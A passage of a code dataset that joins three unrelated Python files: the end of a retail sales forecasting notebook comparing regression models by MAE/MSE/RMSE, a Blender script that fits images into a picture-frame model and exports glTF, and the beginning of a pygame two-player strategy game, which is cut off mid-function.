y_test_fmcg.copy()\ny_test_fmcg3.index = pd.to_datetime(y_test_fmcg3.index)\n\n# Resample the Series based on month\ny_test_fmcg3 = y_test_fmcg3.resample('M').mean()\n\n\n# In[282]:\n\n\n# Evaluate predictions for Multiple Linear Regressor\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_fmcg3.index, y_train_fmcg3, label='Train',linewidth=3)\nplt.plot(y_test_fmcg3.index, y_test_fmcg3, label='Test',linewidth=3)\nplt.plot(ml_errors_fmcg3.index, ml_errors_fmcg3['Predicted'], label='Forecast - Multiple Linear Regressor',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Multiple Linear Regressor')\nplt.show()\n\n\n# In[283]:\n\n\n# Evaluate predictions for Multiple Linear Regression\nfig = plt.figure(figsize=(14,7))\nplt.plot(ml_errors_fmcg3.index, ml_errors_fmcg3.Error, label='Error',linewidth=3)\nplt.plot(ml_errors_fmcg3.index, ml_errors_fmcg3.Actual, label='Actual Sales',linewidth=3)\nplt.plot(ml_errors_fmcg3.index, ml_errors_fmcg3.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Multiple Linear Regressor Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # Others\n\n# In[284]:\n\n\n# Fit the OLS model\nml_model = sm.OLS(y_train_others, x_train_others).fit()\n\n# Make predictions on the test data\nml_preds3 = ml_model.predict(x_test_others)\n\n\n# In[285]:\n\n\nml_errors_others = pd.DataFrame(index=y_test_others.index)\nml_errors_others['Modelname'] = 'Multi Linear Regression'\nml_errors_others['Actual'] = y_test_others\nml_errors_others['Predicted'] = ml_preds3\nml_errors_others['Error'] = ml_preds3 - y_test_others\nml_errors_others.head()\n\n\n# In[286]:\n\n\n# Calculate the mean absolute error (MAE)\nmae_ml_others = mean_absolute_error(y_test_others, ml_preds3)\n\n# Calculate the mean 
squared error (MSE)\nmse_ml_others = mean_squared_error(y_test_others, ml_preds3)\n# Calculate the root mean squared error (RMSE)\nrmse_ml_others = np.sqrt(mse_ml_others)\n\n\n# In[287]:\n\n\ny_train_others3 = y_train_others.resample('M').mean()\n\nml_errors_others3 = ml_errors_others.resample('M').mean()\n\n# Convert the index to datetime\ny_test_others3 = y_test_others.copy()\ny_test_others3.index = pd.to_datetime(y_test_others3.index)\n\n# Resample the Series based on month\ny_test_others3 = y_test_others3.resample('M').mean()\n\n\n# In[288]:\n\n\n# Evaluate predictions for Multiple Linear Regressor\nfig = plt.figure(figsize=(14,7))\nplt.plot(y_train_others3.index, y_train_others3, label='Train',linewidth=3)\nplt.plot(y_test_others3.index, y_test_others3, label='Test',linewidth=3)\nplt.plot(ml_errors_others3.index, ml_errors_others3['Predicted'], label='Forecast - Multiple Linear Regressor',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('StartDate')\nplt.ylabel('Sales')\nplt.title('Forecast using Multiple Linear Regressor')\nplt.show()\n\n\n# In[289]:\n\n\n# Evaluate predictions for Multiple Linear Regression\nfig = plt.figure(figsize=(14,7))\nplt.plot(ml_errors_others3.index, ml_errors_others3.Error, label='Error',linewidth=3)\nplt.plot(ml_errors_others3.index, ml_errors_others3.Actual, label='Actual Sales',linewidth=3)\nplt.plot(ml_errors_others3.index, ml_errors_others3.Predicted, label='Forecasted-Sales',linewidth=3)\nplt.legend(loc='best')\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Multiple Linear Regressor Forecasting with Actual sales vs errors')\nplt.show()\n\n\n# # -----------------------------------------------------------------------------------------\n\n# ## Evaluation Metrics (MAE/MSE/RMSE)\n\n# ### Product Wise\n\n# In[312]:\n\n\nevaluation_data = SA_data.merge(prophet_data, on='Product Identifier', how='inner').merge(des_data, on='Product Identifier', how='inner')\n\nevaluation_data\n\n\n# ### Category Wise\n\n# #### Drinks and Food\n\n# In[291]:\n\n\nSA_errors_df = SA_errors_df.groupby('Modelname').agg(\n    Total_Sales=('Actual', 'sum'),\n    Total_Pred_Sales=('Predicted', 'sum'),\n    Model_Overall_Error=('Error', 'sum'),\n)\n\nSA_errors_df['MAE'] = mae_sa_df\nSA_errors_df['MSE'] = mse_sa_df\nSA_errors_df['RMSE'] = rmse_sa_df\n\n\n# In[292]:\n\n\nresult_lr_df = lr_errors_df.groupby('Modelname').agg(\n    Total_Sales=('Actual', 'sum'),\n    Total_Pred_Sales=('Predicted', 'sum'),\n    Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_lr_df['MAE'] = mae_lr_df\nresult_lr_df['MSE'] = mse_lr_df\nresult_lr_df['RMSE'] = rmse_lr_df\n\n\n# In[294]:\n\n\nresult_etr_df = etr_errors_df.groupby('Modelname').agg(\n    Total_Sales=('Actual', 'sum'),\n    Total_Pred_Sales=('Predicted', 'sum'),\n    Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_etr_df['MAE'] = mae_etr_df\nresult_etr_df['MSE'] = mse_etr_df\nresult_etr_df['RMSE'] = rmse_etr_df\n\n\n# In[295]:\n\n\nresult_ml_df = ml_errors_df.groupby('Modelname').agg(\n    Total_Sales=('Actual', 'sum'),\n    Total_Pred_Sales=('Predicted', 'sum'),\n    Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_ml_df['MAE'] = mae_ml_df\nresult_ml_df['MSE'] = mse_ml_df\nresult_ml_df['RMSE'] = rmse_ml_df\n\n\n# In[296]:\n\n\nresult_pr_df = pr_errors_df.groupby('Modelname').agg(\n    Total_Sales=('Actual', 'sum'),\n    Total_Pred_Sales=('Predicted', 'sum'),\n    Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_pr_df['MAE'] = mae_pr_df\nresult_pr_df['MSE'] = mse_pr_df\nresult_pr_df['RMSE'] = rmse_pr_df\n\n\n# In[297]:\n\n\nlist_objs = 
[SA_errors_df,result_pr_df,result_lr_df,result_etr_df,result_ml_df]\nmetrics_table1 = pd.concat(list_objs)\nmetrics_table1\n\n\n# #### Fast Moving Consumer Goods\n\n# In[313]:\n\n\nSA_errors_fmcg = SA_errors_fmcg.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nSA_errors_fmcg['MAE'] = mae_sa_fmcg\nSA_errors_fmcg['MSE'] = mse_sa_fmcg\nSA_errors_fmcg['RMSE'] = rmse_sa_fmcg\n\n\n# In[300]:\n\n\nresult_lr_fmcg = lr_errors_fmcg.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_lr_fmcg['MAE'] = mae_lr_fmcg\nresult_lr_fmcg['MSE'] = mse_lr_fmcg\nresult_lr_fmcg['RMSE'] = rmse_lr_fmcg\n\n\n# In[301]:\n\n\nresult_etr_fmcg = etr_errors_fmcg.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_etr_fmcg['MAE'] = mae_etr_fmcg\nresult_etr_fmcg['MSE'] = mse_etr_fmcg\nresult_etr_fmcg['RMSE'] = rmse_etr_fmcg\n\n\n# In[302]:\n\n\nresult_ml_fmcg = ml_errors_fmcg.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_ml_fmcg['MAE'] = mae_ml_fmcg\nresult_ml_fmcg['MSE'] = mse_ml_fmcg\nresult_ml_fmcg['RMSE'] = rmse_ml_fmcg\n\n\n# In[303]:\n\n\nresult_pr_fmcg = pr_errors_fmcg.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_pr_fmcg['MAE'] = mae_pr_fmcg\nresult_pr_fmcg['MSE'] = mse_pr_fmcg\nresult_pr_fmcg['RMSE'] = rmse_pr_fmcg\n\n\n# In[304]:\n\n\nlist_objs = [SA_errors_fmcg,result_pr_fmcg,result_lr_fmcg,result_etr_fmcg,result_ml_fmcg]\nmetrics_table2 = pd.concat(list_objs)\nmetrics_table2\n\n\n# #### Others\n\n# In[305]:\n\n\nSA_errors_others = SA_errors_others.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nSA_errors_others['MAE'] = mae_sa_others\nSA_errors_others['MSE'] = mse_sa_others\nSA_errors_others['RMSE'] = rmse_sa_others\n\n\n# In[306]:\n\n\nresult_lr_others = lr_errors_others.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_lr_others['MAE'] = mae_lr_others\nresult_lr_others['MSE'] = mse_lr_others\nresult_lr_others['RMSE'] = rmse_lr_others\n\n\n# In[307]:\n\n\nresult_etr_others = etr_errors_others.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_etr_others['MAE'] = mae_etr_others\nresult_etr_others['MSE'] = mse_etr_others\nresult_etr_others['RMSE'] = rmse_etr_others\n\n\n# In[308]:\n\n\nresult_ml_others = ml_errors_others.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_ml_others['MAE'] = mae_ml_others\nresult_ml_others['MSE'] = mse_ml_others\nresult_ml_others['RMSE'] = rmse_ml_others\n\n\n# In[309]:\n\n\nresult_pr_others = pr_errors_others.groupby('Modelname').agg(\n Total_Sales=('Actual', 'sum'),\n Total_Pred_Sales=('Predicted', 'sum'),\n Model_Overall_Error=('Error', 'sum'),\n)\n\nresult_pr_others['MAE'] = mae_pr_others\nresult_pr_others['MSE'] = mse_pr_others\nresult_pr_others['RMSE'] = 
rmse_pr_others\n\n\n# In[311]:\n\n\nlist_objs = [SA_errors_others,result_pr_others,result_lr_others,result_etr_others,result_ml_others]\nmetrics_table2 = pd.concat(list_objs)\nmetrics_table2\n\n\n# # ------------------------------------------------------------------------------------\n","repo_name":"JosephParavathel/Sales-Forecasting-for-Retail-Chain","sub_path":"project retail chain22.py","file_name":"project retail chain22.py","file_ext":"py","file_size_in_byte":93573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73438187447","text":"import bpy\nimport os\nimport sys\n\n# we get blend file path\nfilepath = bpy.data.filepath\n\n# we get the directory relative to the blend file path\ndir = os.path.dirname(filepath)\n\n# we append our path to blender modules path\n# we use if not statement to do this one time only\nif not dir in sys.path:\n sys.path.append(dir)\n\nfrom src.constants import FRAME_OBJECT_NAME, PICTURE_OBJECT_NAME, PICTURE_MATERIAL_NAME, PICTURE_MATERIAL_TEXTURE_NAME, TOP_FRAME_EDGE_VERTEX_GROUP, TOP_PICTURE_EDGE_VERTEX_GROUP\nfrom src.utils.get_image_dimensions import get_image_dimensions\nfrom src.exporters.exporter import exporter\n\n# Get the directory of the current script\nscript_dir = os.path.dirname(os.path.realpath(__file__))\n\n\ndef init():\n # Set object mode\n bpy.ops.object.mode_set(mode='OBJECT')\n\n # Locate your object by name and collection\n obj = bpy.data.collections['Scene'].objects[FRAME_OBJECT_NAME]\n\n # Make sure the object is the active object for further operations\n bpy.context.view_layer.objects.active = obj\n obj.select_set(True)\n\n\ndef adjust_frame(amount_to_move):\n obj = bpy.data.collections['Scene'].objects[FRAME_OBJECT_NAME]\n\n # Access the specific vertex group\n if TOP_FRAME_EDGE_VERTEX_GROUP in obj.vertex_groups:\n vgroup = obj.vertex_groups[TOP_FRAME_EDGE_VERTEX_GROUP]\n else:\n raise Exception(\"Vertex group \" +\n TOP_FRAME_EDGE_VERTEX_GROUP + \" not found!\")\n\n # Iterate over vertices and manipulate those belonging to the vertex group\n for v in obj.data.vertices:\n for g in v.groups:\n if g.group == vgroup.index:\n # Move vertex along the Z-axis\n v.co.y += amount_to_move\n\n\ndef adjust_picture(amount_to_move):\n obj = bpy.data.collections['Scene'].objects[PICTURE_OBJECT_NAME]\n\n # Access the specific vertex group\n if TOP_PICTURE_EDGE_VERTEX_GROUP in obj.vertex_groups:\n vgroup = obj.vertex_groups[TOP_PICTURE_EDGE_VERTEX_GROUP]\n else:\n raise Exception(\"Vertex group \" +\n TOP_PICTURE_EDGE_VERTEX_GROUP + \" not found!\")\n\n # Iterate over vertices and manipulate those belonging to the vertex group\n for v in obj.data.vertices:\n for g in v.groups:\n if g.group == vgroup.index:\n # Move vertex along the Z-axis\n v.co.y += amount_to_move\n\n\ndef adjust(amount_to_move):\n adjust_frame(amount_to_move)\n adjust_picture(amount_to_move)\n\n\ndef load_image(image_path):\n # Load image into picture object texture\n obj = bpy.data.objects.get(PICTURE_OBJECT_NAME)\n if obj is None:\n raise Exception(\"Object not found!\")\n else:\n mat = bpy.data.materials.get(PICTURE_MATERIAL_NAME)\n if mat is None:\n raise Exception(\"Material not found!\")\n else:\n # Access the shader node tree\n nodes = mat.node_tree.nodes\n tex_image_node = nodes.get(PICTURE_MATERIAL_TEXTURE_NAME)\n\n if tex_image_node is None:\n raise Exception(\n \"'\" + PICTURE_MATERIAL_TEXTURE_NAME + \"' node not found!\")\n else:\n # Update the image\n new_image = bpy.data.images.load(filepath=image_path)\n 
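# Editorial worked example (illustrative, not part of the original add-on): the adjustment computed just below scales a 2-unit-wide plane by the image's inverse aspect ratio, so a square image needs no move while a 3:4 portrait image moves the top edge by 2 * (4/3) - 2 = 2/3 units.
def top_edge_offset(width, height, plane_width=2.0):
    aspect_ratio = width / height
    return plane_width * (1.0 / aspect_ratio) - plane_width

assert abs(top_edge_offset(1200, 1200)) < 1e-9            # square image: no adjustment
assert abs(top_edge_offset(300, 400) - 2.0 / 3.0) < 1e-9  # 3:4 portrait image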
tex_image_node.image = new_image\n\n width, height = get_image_dimensions(image_path)\n aspect_ratio = width / height\n default_plane_width = 2\n amount_to_move = (default_plane_width *\n (1 / aspect_ratio)) - default_plane_width\n\n # Adjust frame & picture\n adjust(amount_to_move)\n\n return amount_to_move\n\n\ndef process_images(input_folder, output_folder):\n # Create output directory if it doesn't exist\n os.makedirs(output_folder, exist_ok=True)\n\n filetypes = ['.jpg', '.jpeg', '.png']\n\n format = \"gltf\"\n\n for filename in os.listdir(input_folder):\n if filename.endswith(tuple(filetypes)):\n print(f\"Processing {filename}...\")\n\n input_path = os.path.join(input_folder, filename)\n output_filename = os.path.splitext(filename)[0] + \".\" + format\n output_path = os.path.join(output_folder, output_filename)\n\n amount_to_move = load_image(input_path)\n exporter(format=format, output_path=output_path)\n\n # Reset frame & picture\n adjust(-amount_to_move)\n\n\nif __name__ == \"__main__\":\n init()\n\n script_dir = os.path.dirname(os.path.abspath(__file__))\n input_folder = os.path.join(script_dir, 'input')\n output_folder = os.path.join(script_dir, 'output')\n\n process_images(input_folder, output_folder)\n","repo_name":"bartaxyz/artwork-framer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33880743072","text":"#Imports\r\nfrom noise import pnoise2\r\nimport numpy as np\r\nimport pygame\r\npygame.init()\r\nimport random\r\n\r\n#Constantes\r\nHEIGHT = 800\r\nWIDTH = 600\r\nAMARELO = (255, 255, 0)\r\nAMARELO_CLARO = (200, 200, 100)\r\nPRETO = (84, 84, 84)\r\nAZUL = (0, 43, 255)\r\nVERDE = (214, 255, 199)\r\n\r\nRAZAO = (30, 40) #30 rows, 40 columns\r\n#Razão a partir da qual são construidos todos os elementos do jogo (cada pixel é um retangulo de 30 por 40, ou qualquer que sejam os dois números ali em cima)\r\n\r\nnum_colunas = WIDTH // RAZAO[0]\r\nnum_linhas = HEIGHT // RAZAO[1]\r\n\r\nFONTE = pygame.font.SysFont('Comic Sans MS', 25)\r\n\r\n#Eventos do usuario\r\ncomputa_trabalhos = pygame.USEREVENT + 0\r\npygame.time.set_timer(computa_trabalhos, 1000)\r\n\r\nclass Control:\r\n def __init__(self):\r\n self.lista_tropas_br = [] # uma lista com todas as tropas brasileiras\r\n self.lista_tropas_sp = [] # uma lista com todas as tropas paulistas\r\n self.tropas_selecionadas_br = [] # uma lista com todas as tropas brasileiras selecionadas\r\n self.tropas_selecionadas_sp = [] # uma lista com todas as tropas paulistas selecionadas\r\n self.lista_florestas = [] # uma lista com as florestas\r\n self.lista_construcoes_br = []\r\n self.lista_construcoes_sp = []\r\n self.lista_minas_br = []\r\n self.lista_minas_sp = []\r\n self.num_gold_br = 0\r\n self.num_gold_sp = 0\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Control):\r\n return NotImplemented\r\n return self.lista_tropas_br == other.lista_tropas_br and self.lista_tropas_sp == other.lista_tropas_sp and self.tropas_selecionadas_br == other.tropas_selecionadas_br and self.tropas_selecionadas_sp == other.tropas_selecionadas_sp and self.lista_florestas == other.lista_florestas and self.lista_construcoes_br == other.lista_construcoes_br and self.lista_construcoes_sp == other.lista_construcoes_sp and self.lista_minas_br == other.lista_minas_br and self.lista_minas_sp == other.lista_minas_sp\r\n\r\n def screen_coordinates_to_grid(self, pos):\r\n tupla = (pos[0] // num_linhas, pos[1] // 
num_colunas)\r\n return tupla\r\n\r\n def grid_to_screen_coordinates(self, grid):\r\n tupla = (grid[0] * num_linhas, grid[1] * num_colunas)\r\n return tupla\r\n\r\n def cria_tropa_br(self, pos): # cria uma tropa dada uma posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n tropa = Tropa(pos, 30)\r\n self.lista_tropas_br.append(tropa)\r\n\r\n def cria_tropa_sp(self, pos):\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n tropa = Tropa(pos, 20)\r\n self.lista_tropas_sp.append(tropa)\r\n\r\n def cria_worker_br(self, pos): # cria uma tropa dada uma posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n worker = Worker(pos, 7)\r\n self.lista_tropas_br.append(worker)\r\n\r\n def cria_worker_sp(self, pos): # cria uma tropa dada uma posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n worker = Worker(pos, 7)\r\n self.lista_tropas_sp.append(worker)\r\n\r\n def pinta_tropas(self, tela): # itera através da lista de tropas e pinta | Atualizado\r\n for tropa in self.lista_tropas_br:\r\n if tropa.hidden == False:\r\n tropa.pinta_tropa_br(tela)\r\n for tropa in self.lista_tropas_sp:\r\n if tropa.hidden == False:\r\n tropa.pinta_tropa_sp(tela)\r\n\r\n def pinta_florestas(self, tela): # itera através da lista de florestas e pinta | Nao precisa atualizacao\r\n for floresta in self.lista_florestas:\r\n floresta.pinta_floresta(tela)\r\n\r\n def pinta_contrucoes(self, tela): #Atualizado\r\n for construcao in self.lista_construcoes_br:\r\n construcao.pinta_construcao_br(tela)\r\n for construcao in self.lista_construcoes_sp:\r\n construcao.pinta_construcao_sp(tela)\r\n\r\n def pinta_minas(self, tela): #Atualizado\r\n for mina in self.lista_minas_br:\r\n mina.pinta_mina_br(tela)\r\n for mina in self.lista_minas_sp:\r\n mina.pinta_mina_sp(tela)\r\n\r\n def pinta_tela(self, tela):\r\n tela.fill(PRETO)\r\n self.pinta_tropas(tela) #Atualizado\r\n self.pinta_florestas(tela) #Nao precisa atualizacao\r\n self.pinta_contrucoes(tela) #Atualizado\r\n self.pinta_minas(tela) #Atualizado\r\n\r\n texto_gold_br = FONTE.render(\"Dinheiro: {}\".format(self.num_gold_br), True, (128,128,128))\r\n texto_gold_sp = FONTE.render(\"Dinheiro: {}\".format(self.num_gold_sp), True, (128,128,128))\r\n tela.blit(texto_gold_br, (0, 0))\r\n tela.blit(texto_gold_sp, (650, 0))\r\n\r\n texto_vida_base_br = FONTE.render(\"Vida: {}\".format(self.lista_construcoes_br[0].vida), True, (128,128,128))\r\n texto_vida_base_sp = FONTE.render(\"Vida: {}\".format(self.lista_construcoes_sp[0].vida), True, (128,128,128))\r\n tela.blit(texto_vida_base_br, (0, 50))\r\n tela.blit(texto_vida_base_sp, (650, 50))\r\n\r\n pygame.display.update()\r\n\r\n def processar_eventos(self, eventos, playerId):\r\n\r\n if self.lista_construcoes_br[0].vida <= 0:\r\n return 0\r\n if self.lista_construcoes_sp[0].vida <= 0:\r\n return 1\r\n\r\n for evento in eventos:\r\n\r\n if evento.type == computa_trabalhos:\r\n for mina in self.lista_minas_br:\r\n self.num_gold_br += mina.computa_trabalho()\r\n\r\n for mina in self.lista_minas_sp:\r\n self.num_gold_sp += mina.computa_trabalho()\r\n\r\n if evento.type == pygame.MOUSEBUTTONDOWN and playerId == 0: #Clique playerId=0 (BR)\r\n pos = pygame.mouse.get_pos()\r\n if evento.button == 1: # botão esquerdo | Selecionar Tropas\r\n if self.verifica_tropa_br(pos) is not None:\r\n t = self.verifica_tropa_br(pos)\r\n t.cor = AMARELO # seleciona uma tropa caso uma já exista no lugar,\r\n # a pinta de 
AMARELO e a adiciona a lista de tropas selecionadas\r\n if t not in self.tropas_selecionadas_br:\r\n self.tropas_selecionadas_br.append(t)\r\n self.organiza_tropas_selecionadas()\r\n\r\n if evento.button == 1: # botão esquerdo | Criar Tropas\r\n mouse_pos = pygame.mouse.get_pos()\r\n if 125 <= mouse_pos[0] <= 125+30 and 375 <= mouse_pos[1] <= 375+40 and self.verifica_tropas((125+20, 375+60)) == (None, None) and self.num_gold_br >=25:\r\n self.num_gold_br -=25\r\n self.cria_tropa_br((125+20, 375+60))\r\n\r\n if evento.button == 3: # botão direito | Colocar Worker p Trbalahar\r\n if self.tropas_selecionadas_br is not None and self.verifica_mina_br(pos) is not None:\r\n for tropa in self.tropas_selecionadas_br:\r\n if isinstance(tropa, Worker):\r\n tropa.trabalha(self.verifica_mina_br(pos))\r\n self.tropas_selecionadas_br.remove(tropa)\r\n\r\n if evento.type == pygame.MOUSEBUTTONDOWN and playerId == 1: #Clique playerId=1 (SP)\r\n pos = pygame.mouse.get_pos()\r\n if evento.button == 1: # botão esquerdo | Selecionar Tropas\r\n if self.verifica_tropa_sp(pos) is not None:\r\n t = self.verifica_tropa_sp(pos)\r\n t.cor = AMARELO # seleciona uma tropa caso uma já exista no lugar,\r\n # a pinta de AMARELO e a adiciona a lista de tropas selecionadas\r\n if t not in self.tropas_selecionadas_sp:\r\n self.tropas_selecionadas_sp.append(t)\r\n self.organiza_tropas_selecionadas()\r\n\r\n if evento.button == 1: # botão esquerdo | Criar Tropas\r\n mouse_pos = pygame.mouse.get_pos()\r\n if 685 <= mouse_pos[0] <= 685+30 and 200 <= mouse_pos[1] <= 200+40 and self.verifica_tropas((685+20, 205+50)) == (None, None) and self.num_gold_sp >=20:\r\n self.num_gold_sp -=20\r\n self.cria_tropa_sp((685+20, 205+50))\r\n\r\n if evento.button == 3: # botão direito\r\n if self.tropas_selecionadas_sp is not None and self.verifica_mina_sp(pos) is not None:\r\n for tropa in self.tropas_selecionadas_sp:\r\n if isinstance(tropa, Worker):\r\n tropa.trabalha(self.verifica_mina_sp(pos))\r\n self.tropas_selecionadas_sp.remove(tropa)\r\n\r\n if evento.type == pygame.KEYDOWN and playerId == 0: #playerId=0 (BR) pressiona botao do teclado\r\n pos = pygame.mouse.get_pos()\r\n\r\n self.organiza_tropas_selecionadas()\r\n\r\n if evento.key == pygame.K_e: #Apertar \"e\" limpa lista de tropas selecionadas\r\n for tropa in self.tropas_selecionadas_br:\r\n tropa.cor = AZUL\r\n self.tropas_selecionadas_br.clear()\r\n\r\n if evento.key == pygame.K_r: #Apertar \"r\" cria trabalhadores\r\n if self.verifica_tropas((220, 400+30)) == (None, None) and self.num_gold_br >= 25:\r\n self.num_gold_br -= 25\r\n self.cria_worker_br((220, 400+30)) # cria uma tropa caso não hajam outras tropas ou florestas no lugar\r\n\r\n if evento.key == pygame.K_w: #W\r\n for tropa in self.tropas_selecionadas_br:\r\n next = (tropa.pos[0], tropa.pos[1] - num_linhas)\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.key == pygame.K_s: #S\r\n for tropa in reversed(self.tropas_selecionadas_br):\r\n next = (tropa.pos[0], tropa.pos[1] + num_linhas)\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.key == pygame.K_d: #D\r\n for tropa in reversed(self.tropas_selecionadas_br):\r\n next = (tropa.pos[0] + num_colunas, tropa.pos[1])\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.key == pygame.K_a: #A\r\n for tropa in 
self.tropas_selecionadas_br:\r\n next = (tropa.pos[0] - num_colunas, tropa.pos[1])\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.type == pygame.KEYDOWN and playerId == 1: #playerId=1 (SP) pressiona botao do teclado\r\n pos = pygame.mouse.get_pos()\r\n\r\n self.organiza_tropas_selecionadas()\r\n\r\n if evento.key == pygame.K_e: #Apertar \"e\" limpa lista de tropas selecionadas\r\n for tropa in self.tropas_selecionadas_sp:\r\n tropa.cor = AZUL\r\n self.tropas_selecionadas_sp.clear()\r\n\r\n if evento.key == pygame.K_r: #Apertar \"r\" cria trabalhadores\r\n if self.verifica_tropas((580, 200+30)) == (None, None) and self.num_gold_sp >= 20:\r\n self.num_gold_sp -= 20\r\n self.cria_worker_sp((580, 200+30)) # cria uma tropa caso não hajam outras tropas ou florestas no lugar\r\n\r\n if evento.key == pygame.K_w: #W\r\n for tropa in self.tropas_selecionadas_sp:\r\n next = (tropa.pos[0], tropa.pos[1] - num_linhas)\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.key == pygame.K_s: #S\r\n for tropa in reversed(self.tropas_selecionadas_sp):\r\n next = (tropa.pos[0], tropa.pos[1] + num_linhas)\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.key == pygame.K_d: #D\r\n for tropa in reversed(self.tropas_selecionadas_sp):\r\n next = (tropa.pos[0] + num_colunas, tropa.pos[1])\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.key == pygame.K_a: #A\r\n for tropa in self.tropas_selecionadas_sp:\r\n next = (tropa.pos[0] - num_colunas, tropa.pos[1])\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if playerId == 0:\r\n self.atacar_br()\r\n else:\r\n self.atacar_sp()\r\n\r\n self.mata_tropas()\r\n\r\n def verifica_tropa_br(self, pos): # Verifica se alguma tropa brasileira já está nessa posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n for tropa in self.lista_tropas_br:\r\n if pos == tropa.pos:\r\n return tropa\r\n return None\r\n\r\n def verifica_tropa_sp(self, pos): # Verifica se alguma tropa paulista já está nessa posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n for tropa in self.lista_tropas_sp:\r\n if pos == tropa.pos:\r\n return tropa\r\n return None\r\n\r\n def verifica_tropas(self, pos): #Retorna uma tupla com os resultados de verifica_tropa_br e verifica_tropa_sp, respectivamente\r\n\r\n br = self.verifica_tropa_br(pos)\r\n sp = self.verifica_tropa_sp(pos)\r\n return (br, sp)\r\n\r\n def atacar_br(self): #Deve ser invocado pelo Brasil\r\n\r\n for tropa in self.lista_tropas_br:\r\n\r\n if not isinstance(tropa, Worker):\r\n if self.screen_coordinates_to_grid(tropa.pos) == (35, 11) or self.screen_coordinates_to_grid(tropa.pos) == (34, 11) or self.screen_coordinates_to_grid(tropa.pos) == (35, 10) or self.screen_coordinates_to_grid(tropa.pos) == (34, 10):\r\n self.lista_construcoes_sp[0].vida -= 1\r\n\r\n else:\r\n direita = (tropa.pos[0] + num_colunas, tropa.pos[1])\r\n esquerda = (tropa.pos[0] - num_colunas, tropa.pos[1])\r\n baixo = (tropa.pos[0], tropa.pos[1] + num_linhas)\r\n cima = (tropa.pos[0], tropa.pos[1] - num_linhas)\r\n\r\n tiles_adjacentes = []\r\n tiles_adjacentes.clear()\r\n\r\n 
